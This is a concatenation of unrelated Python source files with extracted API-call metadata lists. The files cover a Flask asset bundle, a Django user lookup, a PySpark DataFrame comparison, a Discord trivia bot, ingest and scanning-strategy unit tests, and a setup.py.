(['self.db_file_name'], {}), '(self.db_file_name)\n', (906, 925), False, 'from rappel import db\n'), ((322, 350), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (331, 350), False, 'import os\n'), ((456, 484), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (465, 484), False, 'import glob\n'), ((543, 571), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (552, 571), False, 'import glob\n'), ((754, 782), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (763, 782), False, 'import os\n')] |
from flask import Flask
from flask_assets import Bundle, Environment
from .. import app
bundles = {
'js': Bundle(
'js/graph.js',
'js/side_bar.js',
# 'js/regression.js',
# 'js/pca.js',
'js/script.js',
'js/entropy.js',
output='gen/script.js'
),
'css': Bundle(
'css/styles.css',
# 'css/bootstrap.css',
output='gen/styles.css'
)
}
assets = Environment(app)
assets.register(bundles)
| [
"flask_assets.Bundle",
"flask_assets.Environment"
] | [((447, 463), 'flask_assets.Environment', 'Environment', (['app'], {}), '(app)\n', (458, 463), False, 'from flask_assets import Bundle, Environment\n'), ((111, 211), 'flask_assets.Bundle', 'Bundle', (['"""js/graph.js"""', '"""js/side_bar.js"""', '"""js/script.js"""', '"""js/entropy.js"""'], {'output': '"""gen/script.js"""'}), "('js/graph.js', 'js/side_bar.js', 'js/script.js', 'js/entropy.js',\n output='gen/script.js')\n", (117, 211), False, 'from flask_assets import Bundle, Environment\n'), ((328, 377), 'flask_assets.Bundle', 'Bundle', (['"""css/styles.css"""'], {'output': '"""gen/styles.css"""'}), "('css/styles.css', output='gen/styles.css')\n", (334, 377), False, 'from flask_assets import Bundle, Environment\n')] |
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def run(raven, inputs):
"""
Run method.
@ In, raven, object, RAVEN object
@ In, inputs, dict, input dictionary
@ Out, None
"""
# inputs: a, b, c
# outputs: d, e, f
# indices: d(), e(x), f(x, y)
a = raven.a
b = raven.b
c = raven.c
nx = 5
ny = 3
x = np.arange(nx) * 0.1
y = np.arange(ny) * 10
d = a*a
e = x * b
f = np.arange(nx*ny).reshape(nx, ny) * c
# save
raven.x = x
raven.y = y
raven.d = d
raven.e = e
raven.f = f
raven._indexMap = {'e': ['x'],
'f': ['x', 'y']
}
| [
"numpy.arange"
] | [((896, 909), 'numpy.arange', 'np.arange', (['nx'], {}), '(nx)\n', (905, 909), True, 'import numpy as np\n'), ((922, 935), 'numpy.arange', 'np.arange', (['ny'], {}), '(ny)\n', (931, 935), True, 'import numpy as np\n'), ((970, 988), 'numpy.arange', 'np.arange', (['(nx * ny)'], {}), '(nx * ny)\n', (979, 988), True, 'import numpy as np\n')] |
import os
from setuptools import setup, find_packages
import userpypi
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
try:
reqs = open(os.path.join(os.path.dirname(__file__), 'requirements.txt')).read()
except (IOError, OSError):
reqs = ''
setup(
name='userpypi',
version=userpypi.get_version(),
description="A Django application that emulates the Python Package Index.",
long_description=fread("README.rst")+"\n\n"+fread('Changelog.rst')+"\n\n"+fread('AUTHORS.rst'),
classifiers=[
"Framework :: Django",
"Development Status :: 4 - Beta",
#"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Environment :: Web Environment",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: BSD License",
"Topic :: System :: Software Distribution",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='django pypi packaging index',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='http://github.com/benliles/chishop',
license='BSD',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=reqs,
)
| [
"os.path.dirname",
"setuptools.find_packages",
"userpypi.get_version"
] | [((332, 354), 'userpypi.get_version', 'userpypi.get_version', ([], {}), '()\n', (352, 354), False, 'import userpypi\n'), ((1361, 1376), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1374, 1376), False, 'from setuptools import setup, find_packages\n'), ((118, 143), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (133, 143), False, 'import os\n'), ((195, 220), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (210, 220), False, 'import os\n')] |
from service_user.models import UserModel
from django.core.exceptions import ValidationError
def get_user_instance_with_session_id(user_id, session_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
session_id__exact=session_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_session_id(user_id, session_id):
return get_user_instance_with_session_id(user_id, session_id) is not None
def get_user_instance_with_token_id(user_id, token_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
token_id__exact=token_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_token_id(user_id, token_id):
return get_user_instance_with_token_id(user_id=user_id, token_id=token_id) is not None
| [
"service_user.models.UserModel.objects.get"
] | [((183, 258), 'service_user.models.UserModel.objects.get', 'UserModel.objects.get', ([], {'user_id__exact': 'user_id', 'session_id__exact': 'session_id'}), '(user_id__exact=user_id, session_id__exact=session_id)\n', (204, 258), False, 'from service_user.models import UserModel\n'), ((610, 681), 'service_user.models.UserModel.objects.get', 'UserModel.objects.get', ([], {'user_id__exact': 'user_id', 'token_id__exact': 'token_id'}), '(user_id__exact=user_id, token_id__exact=token_id)\n', (631, 681), False, 'from service_user.models import UserModel\n')] |
# Copyright 2019 The DataFrame Show Reader Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyspark.sql import DataFrame
from pyspark.sql.types import StructField, StructType
def assert_equal(expected: DataFrame,
actual: DataFrame,
verbose: bool = True,
ignore_schema_metadata: bool = True):
"""Assert that two DataFrames contain the same data.
:param expected: The expected DataFrame
:param actual: The actual DataFrame
:param verbose: If the DataFrames are not equal, show
the DataFrame schema or data (depending on where the mismatch is) in order
to help debugging.
:param ignore_schema_metadata: When comparing the schemas, ignore the
metadata, which can include comments.
# comments.
:return: None
"""
if expected is None:
assert actual is None, \
'The expected DataFrame is None, but the actual DataFrame is not.'
return # Both DataFrames are None.
else:
assert actual is not None, \
'The actual DataFrame is None, but the expected DataFrame is not.'
expected.persist()
actual.persist()
expected_schema = _copy_without_metadata(expected.schema) if \
ignore_schema_metadata else expected.schema
actual_schema = _copy_without_metadata(actual.schema) if \
ignore_schema_metadata else actual.schema
is_schema_match = expected_schema == actual_schema
if not is_schema_match:
if verbose:
# Print the schema to help identify subtle cases such as one DF
# containing an INT and the other containing a BIGINT, which can be
# an issue if we try to write a DF containing a BIGINT into a
# previously existing Hive table defined to contain an INT.
print('Expected DataFrame schema:')
expected.printSchema()
print('Actual DataFrame schema:')
actual.printSchema()
assert is_schema_match is True, 'The DataFrame schemas differ.'
is_match = (0 == (expected.count() - actual.count()) ==
expected.subtract(actual).count() ==
actual.subtract(expected).count())
if not is_match:
if verbose:
print('Expected DataFrame:')
expected.show(20, False)
print('Actual DataFrame:')
actual.show(20, False)
# Possible future enhancement: Make the assertion failure message more
# helpful.
assert is_match is True, 'The DataFrames differ.'
def _copy_without_metadata(schema: StructType):
return StructType(
[StructField(f.name, f.dataType, f.nullable) for f in schema]
)
| [
"pyspark.sql.types.StructField"
] | [((3159, 3202), 'pyspark.sql.types.StructField', 'StructField', (['f.name', 'f.dataType', 'f.nullable'], {}), '(f.name, f.dataType, f.nullable)\n', (3170, 3202), False, 'from pyspark.sql.types import StructField, StructType\n')] |
from tempfile import TemporaryFile
import discord
#import requests
import json
import asyncio
from discord.ext import commands
import re
from random import randint
questions = ["When was NT founded?", "", "q3"]
answers = {
"Which of the following celebs went to NT? \na) <NAME> \nb) <NAME> \nc) <NAME> \nd) <NAME>" : "c",
"When was NTCI founded? \na) 1910 \nb) 1912\nc) 1915\nd) 1917" : "b",
"When did the first Maytime melodies take place? \na) May 1947 \nb) May 1940 \nc) May 1952 \nd) February 1952" : "a",
"How much money did NT raise in their first Charity Week that took place in 1986? \na) $1000 \nb) $1500 \nc) $2000 \nd) $3000" : "a",
"When did NT switch to a new building? \na) 2008 \nb) 2009 \nc) 2010 \nd) 2011" : "c",
"What was Graffiti originally known as? \na) The NTCI Post \nb) Graffiti \nc) The NT Star \nd) The Roehampton Edition" : "d",
"Which of the following teachers are married to another teacher at NT? \na) Miron \nb) Zohar \nc) Seepersad \nd) Kinoshita" : "d"
}
questions = list(answers.keys())
#print(questions)
scores = {
}
def get_question():
index = randint(0, len(questions)-1)
return questions[index], answers[questions[index]]
class trivia(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_message(self, message):
if message.content.startswith('!start_trivia'):
print(str(message.author)[:-5])
curr_questions = []
curr_answers = []
count = 0
while count < 3:
qs, answer = get_question()
if qs in curr_questions:
continue
else:
curr_questions.append(qs)
curr_answers.append(answer)
count += 1
await message.channel.send(qs)
if str(message.author)[:-5] not in scores.keys():
scores[str(message.author)[:-5]] = 0
curr_score = 0
def check(m):
return m.author == message.author
try:
guess = await self.client.wait_for('message', check=check, timeout=30.0)
except asyncio.TimeoutError:
return await message.channel.send('Sorry, you took too long')
user_answers = guess.content
#print(user_answers)
user_answers = str(user_answers).split()
#print(user_answers)
i = 0
while i < len(user_answers):
#print(user_answers[i])
try:
if user_answers[i] == answers[curr_questions[i]]:
await message.channel.send('Correct!')
curr_score += 1
#val = "here is your current score:" + str(scores[str(message.author)[:-5]])
else:
await message.channel.send('Wrong!')
except:
await message.channel.send("error")
i += 1
val = "Your final score: " + str(curr_score) + "/3"
await message.channel.send(val)
if scores[str(message.author)[:-5]] < curr_score:
scores[str(message.author)[:-5]] = curr_score
@commands.command()
async def my_trivia_score(self, ctx):
#print(str(ctx.author)[:-5])
#print(scores[str(ctx.author)[:-5]])
try:
val = scores[str(ctx.author)[:-5]]
if val >= 3:
val = "your highest quiz score is: " + str(val) + ". You are a patriot to NT."
await ctx.send(val)
else:
val = "your highest quiz score is: " + str(val) + ". You could do better :("
await ctx.send(val)
except TypeError:
await ctx.send("No quiz record found :(")
#await ctx.send(scores[str(ctx.author)[:-5]])
@commands.command()
async def trivia_instructions(self, ctx):
await ctx.send("This NT trivia will have 3 question multiple choice questions that you have to answer in 30 seconds. Use the command: '!start_trivia' to start the trivia. Once it is started, the questions will be printed. Type your answers out in a single line with the letter of the option and a space between each answer. Submit by pressing enter. Once you've submitted the bot will type out your score. \n Use the command: 'my_trivia_score' to see your highest trivia score. ")
"""
questions = ["starting", "q2", "q3"]
answers = {
"starting" : "hi",
"q2" : "hi2",
"q3" : "hi3"
}
for question in questions:
argument[question] = ""
class quiz(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def new_quiz(self, ctx):
score = 0
for question in questions:
await ctx.send(question)
if question == "starting:":
continue
else:
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
await ctx.send("Next question:")
if answers[question] == message.content:
await ctx.send("correct!")
score += 1
else:
await ctx.send("wrong!")
await ctx.send("your score was:", score)
"""
def setup(client):
client.add_cog(trivia(client))
| [
"discord.ext.commands.Cog.listener",
"discord.ext.commands.command"
] | [((1314, 1337), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (1335, 1337), False, 'from discord.ext import commands\n'), ((3403, 3421), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (3419, 3421), False, 'from discord.ext import commands\n'), ((4052, 4070), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (4068, 4070), False, 'from discord.ext import commands\n')] |
import json
import os
import unittest
from unittest.mock import MagicMock
from ingest.api.ingestapi import IngestApi
from ingest.downloader.data_collector import DataCollector
class DataCollectorTest(unittest.TestCase):
def setUp(self) -> None:
self.maxDiff = None
self.mock_ingest_api = MagicMock(spec=IngestApi)
self.data_collector = DataCollector(self.mock_ingest_api)
self.script_dir = os.path.dirname(__file__)
self.parent_dir = os.path.split(self.script_dir)[0]
self.resources_dir = os.path.join(self.parent_dir, 'resources')
def test_collect_data_by_submission_uuid_returns_correctly(self):
# given
project = self._make_project_data()
self._mock_ingest_api(project)
expected_json = [project['project']] + \
project['biomaterials'] + \
project['processes'] + \
project['protocols'] + \
project['files']
# when
project_uuid = '1234'
entity_dict = self.data_collector.collect_data_by_submission_uuid(project_uuid)
# then
self._assert_all_entities_are_created(entity_dict, expected_json)
self._assert_entities_have_correct_inputs(entity_dict)
def _assert_all_entities_are_created(self, entity_dict, expected_json):
expected_content_list = [entity['content'] for entity in expected_json]
actual_content_list = [entity.content for entity in entity_dict.values()]
self.assertCountEqual(expected_content_list, actual_content_list)
def _assert_entities_have_correct_inputs(self, entity_dict):
specimen = entity_dict['6197380b2807a377aad3a303']
donor = entity_dict['6197380b2807a377aad3a302']
process = entity_dict['6197380b2807a377aad3a30c']
protocols = [entity_dict['6197380b2807a377aad3a307']]
self.assertEqual(specimen.inputs, [donor])
self.assertEqual(specimen.process, process)
self.assertEqual(specimen.protocols, protocols)
self.assertCountEqual([input.id for input in specimen.inputs], [donor.id], 'The specimen has no donor input.')
self.assertEqual(specimen.process.id, process.id,
'The process which links the specimen to the donor is missing.')
self.assertEqual([protocol.id for protocol in specimen.protocols], [protocol.id for protocol in protocols],
'The protocols for the process which links the specimen to the donor are incorrect.')
cell_suspension = entity_dict['6197380b2807a377aad3a304']
file = entity_dict['6197380b2807a377aad3a306']
assay_process = entity_dict['6197380b2807a377aad3a30e']
assay_process_protocols = [entity_dict['6197380b2807a377aad3a30a'], entity_dict['6197380b2807a377aad3a30b']]
self.assertCountEqual([input.id for input in file.inputs], [cell_suspension.id],
'The sequencing file has no cell suspension input.')
self.assertEqual(file.process.id, assay_process.id,
'The process which links the file to the cell suspension is missing.')
self.assertEqual([protocol.id for protocol in file.protocols],
[protocol.id for protocol in assay_process_protocols],
'The protocols for the process which links the file to the cell suspension is incorrect.')
def _mock_ingest_api(self, project):
self.mock_ingest_api.get_submission_by_uuid.return_value = project['submission']
self.mock_ingest_api.get_related_project.return_value = project['project']
response = MagicMock()
response.json.return_value = project['linking_map']
self.mock_ingest_api.get.return_value = response
self.mock_ingest_api.get_related_entities.side_effect = \
[
iter(project['biomaterials']),
iter(project['processes']),
iter(project['protocols']),
iter(project['files'])
]
def _make_project_data(self):
with open(self.resources_dir + '/mock_submission.json') as file:
mock_submission_json = json.load(file)
with open(self.resources_dir + '/mock_project.json') as file:
mock_project_json = json.load(file)
with open(self.resources_dir + '/mock_biomaterials.json') as file:
mock_biomaterials_json = json.load(file)
with open(self.resources_dir + '/mock_processes.json') as file:
mock_processes_json = json.load(file)
with open(self.resources_dir + '/mock_protocols.json') as file:
mock_protocols_json = json.load(file)
with open(self.resources_dir + '/mock_files.json') as file:
mock_files_json = json.load(file)
with open(self.resources_dir + '/linking-map.json') as file:
linking_map = json.load(file)
return {
'submission': mock_submission_json,
'project': mock_project_json,
'biomaterials': mock_biomaterials_json,
'processes': mock_processes_json,
'protocols': mock_protocols_json,
'files': mock_files_json,
'linking_map': linking_map
}
if __name__ == '__main__':
unittest.main()
| [
"unittest.mock.MagicMock",
"os.path.join",
"ingest.downloader.data_collector.DataCollector",
"os.path.split",
"json.load",
"os.path.dirname",
"unittest.main"
] | [((5330, 5345), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5343, 5345), False, 'import unittest\n'), ((312, 337), 'unittest.mock.MagicMock', 'MagicMock', ([], {'spec': 'IngestApi'}), '(spec=IngestApi)\n', (321, 337), False, 'from unittest.mock import MagicMock\n'), ((368, 403), 'ingest.downloader.data_collector.DataCollector', 'DataCollector', (['self.mock_ingest_api'], {}), '(self.mock_ingest_api)\n', (381, 403), False, 'from ingest.downloader.data_collector import DataCollector\n'), ((430, 455), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (445, 455), False, 'import os\n'), ((545, 587), 'os.path.join', 'os.path.join', (['self.parent_dir', '"""resources"""'], {}), "(self.parent_dir, 'resources')\n", (557, 587), False, 'import os\n'), ((3687, 3698), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3696, 3698), False, 'from unittest.mock import MagicMock\n'), ((482, 512), 'os.path.split', 'os.path.split', (['self.script_dir'], {}), '(self.script_dir)\n', (495, 512), False, 'import os\n'), ((4227, 4242), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4236, 4242), False, 'import json\n'), ((4345, 4360), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4354, 4360), False, 'import json\n'), ((4473, 4488), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4482, 4488), False, 'import json\n'), ((4595, 4610), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4604, 4610), False, 'import json\n'), ((4717, 4732), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4726, 4732), False, 'import json\n'), ((4831, 4846), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4840, 4846), False, 'import json\n'), ((4942, 4957), 'json.load', 'json.load', (['file'], {}), '(file)\n', (4951, 4957), False, 'import json\n')] |
""""
STRIP Scanning Strategy Tools test module.
"""
import unittest
import healpy as hp
import numpy as np
from ScanningTools import ScanningTools as st
from astropy.time import Time
from astropy.coordinates import SkyCoord, AltAz
from ScanningTools.Quaternions import Quaternion as q
# Sexagesimal angle fixtures: each row is (degrees, arcminutes, arcseconds).
angles = np.array([[-10, 45, 59],
                   [30, 35, 15],
                   [-180, 25, 20],
                   [3, 4, 5]])
# Time fixtures: each row is (hours, minutes, seconds).
hours = np.array([[23, 59, 16],
                  [7, 56, 59]])
# Decimal values used to exercise the decimal -> sexagesimal conversion.
t = np.array([1.546585, -0.56, 0.3333333333333333333, -1.001])
### INSTRUMENT CHARACTERISTICS ###
pointing_accuracy = np.array([0, 0, 25]) #deg (arcsec)
###
### LOCATION INFORMATION ###
# Site coordinates in sexagesimal form; presumably the Teide Observatory,
# Tenerife (28 16' N, 16 38' W, 2400 m) -- TODO confirm.
LAT = np.array([28, 16, 24]) #deg
LONG = np.array([-16, 38, 32]) #deg
Height = 2400 #m
loc = st.get_location(LAT, LONG, Height)
###
### TIME INFORMATION ###
LCT_start = (0, 0, 0) #h, m, s (local civil time at start)
LCD_start = (1, 1, 2015) #d, m, y (local civil date at start)
UTC, DST = (0 , 0) #h (UTC offset and daylight-saving correction)
###
### ENGINE ROTATION INFORMATION ###
zenith_distance = 31 #deg (boresight tilt away from the zenith)
polarization_angle = 60 #deg
###
class TestScanningTools(unittest.TestCase):
def test_period2sec(self):
one_sidereal_year = st.period2sec(years=1, days=0, hours=0, min=0, sec=0, sidereal=True)
one_solar_year = st.period2sec(years=1, days=0, hours=0, min=0, sec=0)
one_sidereal_day = st.period2sec(years=0, days=1, hours=0, min=0, sec=0, sidereal=True)
one_solar_day = st.period2sec(years=0, days=1, hours=0, min=0, sec=0)
period_0 = st.period2sec(years=1, days=1, hours=0, min=0, sec=0, sidereal=True)
period_1 = st.period2sec(years=5, days=30, hours=0, min=0, sec=0, sidereal=True)
period_2 = st.period2sec(years=2, days=17, hours=0, min=0, sec=0, sidereal=True)
period_3 = st.period2sec(years=10, days=21, hours=15, min=3, sec=25, sidereal=True)
self.assertEqual(one_sidereal_year, 31558145)
self.assertEqual(one_solar_year, 31536000)
self.assertEqual(one_sidereal_day, 86164)
self.assertEqual(one_solar_day, 86400)
self.assertEqual(period_0, 31644309)
self.assertEqual(period_1, 160375649)
self.assertEqual(period_2, 64581080)
self.assertEqual(period_3, 317445103)
def test_sex2dec(self):
ang0 = st.sex2dec(angles)
ang1 = st.sex2dec(angles[0], radians=True)
self.assertTrue(np.allclose(ang0, np.array([-10.76638889, 30.587500, -180.422222,
3.06805556])))
self.assertEqual(ang1, np.radians(ang0[0]))
def test_dec2sex(self):
t0 = st.dec2sex(t)
t00 = st.dec2sex(t[0])
self.assertTrue(np.allclose(t0, np.array([[1, 32, 47.706], [-0, 33, 36], [0, 20, 0],
[-1, 0, 3.6]])))
self.assertTrue(np.allclose(t00, np.array([1, 32, 47.706])))
def test_degrees2hours(self):
ang0 = st.degrees2hours(angles)
ang1 = st.degrees2hours(angles[2], decimal=True)
self.assertTrue(np.allclose(ang0, st.dec2sex(st.sex2dec(angles) / 15)))
self.assertTrue(np.allclose(ang1, st.sex2dec(angles)[2] / 15))
def test_hours2degrees(self):
ang0 = st.hours2degrees(hours[1])
ang1 = st.hours2degrees(hours, decimal=True)
self.assertTrue(np.allclose(ang0, st.dec2sex(st.sex2dec(hours[1]) * 15)))
self.assertTrue(np.allclose(ang1, st.sex2dec(hours) * 15))
def test_LocalCivilTime2JulianDay(self):
"Integrated Test: it includes also the LCT2GCD and GCD2JD function conversion"
Jul_1_2013 = st.LocalCivilTime2JulianDay((3, 37, 0), (1, 7, 2013), UTC=4, DST=1)
Jun_19_2009 = st.LocalCivilTime2JulianDay((18, 0, 0), (19, 6, 2009), UTC=0, DST=0)
self.assertTrue(np.allclose(Jul_1_2013, 2456474.442))
self.assertTrue(np.allclose(Jun_19_2009, 2455002.25))
t = Time(['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2']).jd
T = np.array([st.LocalCivilTime2JulianDay((0, 0, 10), (1, 1, 2015), UTC=0, DST=0),
st.LocalCivilTime2JulianDay((5, 15, 24.3), (3, 1, 2018), UTC=0, DST=0),
st.LocalCivilTime2JulianDay((19, 30, 2), (22, 4, 1980), UTC=0, DST=0)])
self.assertTrue(np.allclose(t, T))
def test_LocalCivilTime2LocalSiderealTime(self):
LONG = st.dec2sex(0.1)
Jun_19_2009 = st.LocalCivilTime2LocalSiderealTime((18, 0, 0),
(19, 6, 2009),
LONG, UTC=0, DST=0)
self.assertTrue(np.allclose(Jun_19_2009, np.array([11, 52, 46.843])))
def test_get_nside_eff(self):
fwhm_beam0 = np.array([0, 5, 0]) #deg (arcmin)
fwhm_beam1 = np.array([0, 21, 0]) #deg (arcmin)
fwhm_beam2 = np.array([0, 32, 0]) #deg (arcmin)
self.assertEqual(st.get_nside_eff(fwhm_beam0), 1024)
self.assertEqual(st.get_nside_eff(fwhm_beam1), 256)
self.assertEqual(st.get_nside_eff(fwhm_beam2), 128)
def test_get_full_fp(self):
def general_test(x_fp, i, j):
self.assertTrue(np.allclose(x_fp[i, 0], x_fp[j, 0]))
self.assertTrue(np.allclose(x_fp[i, 1], -x_fp[j, 1]))
self.assertTrue(np.allclose(x_fp[i, 2], x_fp[j, 2]))
x_fp, n_horns = st.get_full_fp('./ScanningTools/fp_data/fp_theta.txt',
'./ScanningTools/fp_data/fp_phi.txt')
self.assertTrue(np.allclose(np.sum(x_fp**2, axis=1), 1))
self.assertEqual(n_horns, 49)
general_test(x_fp, 7, 42)
general_test(x_fp, 8, 47)
general_test(x_fp, 9, 46)
general_test(x_fp, 10, 45)
general_test(x_fp, 11, 44)
general_test(x_fp, 12, 43)
general_test(x_fp, 13, 48)
general_test(x_fp, 14, 35)
general_test(x_fp, 15, 40)
general_test(x_fp, 16, 39)
general_test(x_fp, 17, 38)
general_test(x_fp, 18, 37)
general_test(x_fp, 19, 36)
general_test(x_fp, 20, 41)
general_test(x_fp, 21, 28)
general_test(x_fp, 22, 33)
general_test(x_fp, 23, 32)
general_test(x_fp, 24, 31)
general_test(x_fp, 25, 30)
general_test(x_fp, 26, 29)
general_test(x_fp, 27, 34)
def get_full_fp_polarization_angles(self):
def general_test(x_fp, i, j):
self.assertTrue(np.allclose(x_fp[i, 0], x_fp[j, 0]))
self.assertTrue(np.allclose(x_fp[i, 1], -x_fp[j, 1]))
self.assertTrue(np.allclose(x_fp[i, 2], x_fp[j, 2]))
full_psi, polarization_versor = st.get_full_fp_polarization_angles(
'./ScanningTools/fp_data/fp_psi.txt')
self.assertTrue(np.allclose(np.sum(polarization_versor**2, axis=1), 1))
self.assertEqual(len(full_psi), 49)
self.assertEqual(len(polarization_versor), 49)
general_test(polarization_versor, 7, 42)
general_test(polarization_versor, 8, 47)
general_test(polarization_versor, 9, 46)
general_test(polarization_versor, 10, 45)
general_test(polarization_versor, 11, 44)
general_test(polarization_versor, 12, 43)
general_test(polarization_versor, 13, 48)
general_test(polarization_versor, 14, 35)
general_test(polarization_versor, 15, 40)
general_test(polarization_versor, 16, 39)
general_test(polarization_versor, 17, 38)
general_test(polarization_versor, 18, 37)
general_test(polarization_versor, 19, 36)
general_test(polarization_versor, 20, 41)
general_test(polarization_versor, 21, 28)
general_test(polarization_versor, 22, 33)
general_test(polarization_versor, 23, 32)
general_test(polarization_versor, 24, 31)
general_test(polarization_versor, 25, 30)
general_test(polarization_versor, 26, 29)
general_test(polarization_versor, 27, 34)
def test_get_timeJD(self):
def general_tests(time, sampling_rate, JD, JD_step, t0, t1):
self.assertTrue(np.allclose(time[1:] - time[0:-1], 1 / sampling_rate))
self.assertEqual(len(JD), len(time))
self.assertEqual(np.sum(np.diff(JD_step)), 0)
self.assertTrue(np.allclose((t1-t0).sec, 1 / sampling_rate, rtol=1e-3))
def tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1):
self.assertEqual(obs_t, 3600)
self.assertEqual(len(time), obs_t * sampling_rate)
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
def tests_1d(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST):
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
obs_t0, time0, JD0 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time,
UTC=UTC, DST=DST, day=None)
self.assertEqual(obs_t, 86400)
self.assertEqual(obs_t, obs_t0)
self.assertEqual(len(time), obs_t * sampling_rate)
self.assertTrue(len(time), len(time0))
self.assertTrue(len(JD), len(JD0))
def tests_1y(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST, day=None):
general_tests(time, sampling_rate, JD, JD_step, t0, t1)
self.assertEqual(obs_t, 86400 * 365)
if day:
self.assertEqual(len(time), 86400 * sampling_rate)
if day > 1:
self.assertTrue(time[0] != 0)
else:
self.assertTrue(time[0] == 0)
else:
self.assertEqual(len(time), obs_t * sampling_rate)
sampling_rate = 50 #Hz
obs_time = (0, 0, 1, 0, 0) #y, d, h, m, s
day = None
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1)
sampling_rate = 5 #Hz
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1h(obs_t, time, sampling_rate, JD, JD_step, t0, t1)
sampling_rate = 3 #Hz
obs_time = (0, 1, 0, 0, 0) #y, d, h, m, s
day = 1
obs_t, time, JD = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day)
JD_step = JD[1:] - JD[:-1]
t0 = Time(JD[0], format='jd', location=loc)
t1 = Time(JD[0] + JD_step[0], format='jd', location=loc)
tests_1d(LCT_start, LCD_start, obs_t, time, sampling_rate, JD, JD_step, t0, t1, UTC=UTC,
DST=DST)
sampling_rate = 1 #Hz
obs_time = (1, 0, 0, 0, 0) #y, d, h, m, s
day0, day1, day2, day3, day4 = (1, 5, 364, None, None)
obs_t0, time0, JD0 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day0)
JD_step0 = JD0[1:] - JD0[:-1]
t00 = Time(JD0[0], format='jd', location=loc)
t10 = Time(JD0[0] + JD_step0[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t0, time0, sampling_rate, JD0, JD_step0, t00, t10,
UTC=UTC, DST=DST, day=day0)
obs_t1, time1, JD1 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day1)
JD_step1 = JD1[1:] - JD1[:-1]
t01 = Time(JD1[0], format='jd', location=loc)
t11 = Time(JD1[0] + JD_step1[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t1, time1, sampling_rate, JD1, JD_step1, t01, t11,
UTC=UTC, DST=DST, day=day1)
obs_t2, time2, JD2 = st.get_timeJD(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC,
DST=DST, day=day2)
JD_step2 = JD2[1:] - JD2[:-1]
t02 = Time(JD2[0], format='jd', location=loc)
t12 = Time(JD2[0] + JD_step2[0], format='jd', location=loc)
tests_1y(LCT_start, LCD_start, obs_t2, time2, sampling_rate, JD2, JD_step2, t02, t12,
UTC=UTC, DST=DST, day=day2)
